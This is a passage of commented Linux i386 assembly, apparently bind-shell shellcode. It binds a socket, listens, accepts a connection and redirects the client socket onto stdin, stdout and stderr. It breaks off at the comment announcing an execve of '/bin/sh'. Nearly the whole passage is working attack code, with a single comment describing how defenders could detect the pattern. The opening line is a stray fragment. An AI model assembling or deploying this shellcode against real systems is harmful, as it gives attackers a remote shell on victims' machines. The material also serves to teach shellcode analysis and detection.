family:02,& any 2bytes:BB
; --- bind(server, &addr, sizeof(addr)) via socketcall(SYS_BIND, args) ---
; Linux i386 syscall ABI: eax = syscall number, ebx/ecx/edx = args 1-3,
; trap with int 0x80.  socketcall (102) multiplexes the socket API:
; ebx = sub-call number, ecx = pointer to an int array holding that call's args.
; Register state carried in from code before this excerpt (not visible here):
;   esi = server socket fd, edx = 0, bl = 1 (left by the earlier SYS_SOCKET call),
;   and the sockaddr_in struct already built on the stack at esp.
; The single-byte forms (mov al / inc bl / push byte) touch only the low byte;
; they rely on the upper bytes of eax/ebx already being zero -- TODO confirm
; against the preceding code.  No return value is checked anywhere here.
mov ecx,esp ; ecx = &addr (the sockaddr_in struct built on the stack just above)
push byte 0x10 ; args[2] = sizeof(struct sockaddr_in) = 16
push ecx ; args[1] = &addr
push esi ; args[0] = server fd (held in esi)
mov ecx,esp ; ecx = &args (pushed in reverse order, so esp points at args[0])
inc bl ; ebx = 2 = SYS_BIND (assumes bl was 1 from the earlier SYS_SOCKET call)
mov al,102 ; eax = 102 = socketcall (only the low byte is written)
int 0x80 ; bind(server, &addr, 16); eax = 0 on success or -errno, not checked
;listen(server, 0)
push edx ; args[1] = backlog = 0 (edx is still zero)
push esi ; args[0] = server fd
mov ecx,esp ; ecx = &args for the SYS_LISTEN call that follows
; --- listen / accept via socketcall, then dup2 the client socket onto fds 0-2 ---
; Continues the Linux i386 int 0x80 sequence from the lines above: eax = syscall
; number, ebx/ecx/edx = args 1-3; socketcall (102) takes the sub-call number in
; ebx and a pointer to its arg array in ecx.  Assumes esi = server fd, edx = 0,
; ebx = 2 from the preceding SYS_BIND call, and ecx = &args for listen (already
; set up just above).  The byte-sized mov al / mov bl forms rely on the upper
; bytes of eax/ebx being zero -- TODO confirm.  Return values are never checked.
; For defenders: a socket fd being dup2'd onto 0/1/2 immediately before an
; execve is the characteristic bind-shell sequence; syscall auditing (e.g.
; auditd or seccomp logging on socketcall/dup2/execve) surfaces it.
mov bl,0x4 ; ebx = 4 = SYS_LISTEN (writes bl only; upper bytes assumed zero)
mov al,102 ; eax = 102 = socketcall
int 0x80 ; listen(server, 0); result not checked
;client=accept(server, 0, 0)
push edx ; args[2] = addrlen = NULL (edx still zero)
push edx ; args[1] = addr = NULL
push esi ; args[0] = server fd
mov ecx,esp ; ecx = &args for SYS_ACCEPT
inc bl ; ebx = 5 = SYS_ACCEPT (bl was 4)
mov al,102 ; eax = 102 = socketcall
int 0x80 ; blocks until a client connects; eax = client fd, or -errno (unchecked)
; prepare for dup2 commands, need client file handle saved in ebx
mov ebx,eax ; ebx = client fd = oldfd argument for each dup2 below
;dup2(client, 0)
xor ecx,ecx ; ecx = 0 = newfd (stdin)
mov al,63 ; eax = 63 (0x3f) = dup2 -- decimal 63, not 0x63; assumes client fd < 256 so the upper bytes are already zero
int 0x80 ; dup2(client, 0): stdin now comes from the socket
;dup2(client, 1)
inc ecx ; ecx = 1 = newfd (stdout)
mov al,63 ; eax = 63 = dup2 (dup2 returns newfd on success, so eax's upper bytes stayed zero)
int 0x80 ; dup2(client, 1): stdout now goes to the socket
;dup2(client, 2)
inc ecx ; ecx = 2 = newfd (stderr)
mov al,63 ; eax = 63 = dup2
int 0x80 ; dup2(client, 2): stderr now goes to the socket
;standard execve("/bin/sh".